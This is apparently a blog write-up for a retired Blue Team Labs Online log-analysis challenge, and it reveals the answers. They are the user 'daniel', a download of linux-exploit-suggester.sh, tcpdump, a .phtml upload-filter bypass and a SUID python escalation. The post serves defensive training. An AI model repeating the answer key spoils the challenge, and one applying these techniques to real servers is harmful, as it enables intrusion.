BTLO Challenge: Log Analysis – Privilege Escalation

{“content”:”

Description:

\r\n\r\n

This is a retired Challenge from Blue Team Labs Online, categorized as Easy and CTF-like. You can try to solve it for yourself after registering on the platform, like most of their Challenges this one is also free.
\r\nOther than Challenges they also offer Investigations, most of these require a PRO subscription, but head on to the platform and check out the current state.

\r\n\r\n

I found out about this platform from Gerald Auger, Ph.D., book author and chief conent creator of Simply Cyber, information security YouTube channel. Watching his live streams i once won a one-month PRO BTLO subscription, so if you are interested in this field and occasional InfoSec giveaways are your kind of giveaways, you don’t want to miss out on his content.

\r\n\r\n

Task:

\r\n\r\n

You are presented with a scenario description, reading material, and a log file from an attacked server.

“} {“content”:”

Looking at the log file above, you have to answer questions about the event that took place. Not to spoil the Challenge, if you want to see the answers click on the question bellow and the answer will reveal:
\r\n\r\n

\r\n1. What user (other than ‘root’) is present on the server?daniel\r\n
\r\n\r\n
\r\n2. What script did the attacker try to download to the server?linux-exploit-suggester.sh\r\n
\r\n\r\n
\r\n3. What packet analyzer tool did the attacker try to use?tcpdump\r\n
\r\n\r\n
\r\n4. What file extension did the attacker use to bypass the file upload filter implemented by the developer?.phtml\r\n
\r\n\r\n
\r\n5. Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load4\r\n
\r\n\r\n

Other free resources:

\r\n\r\n”}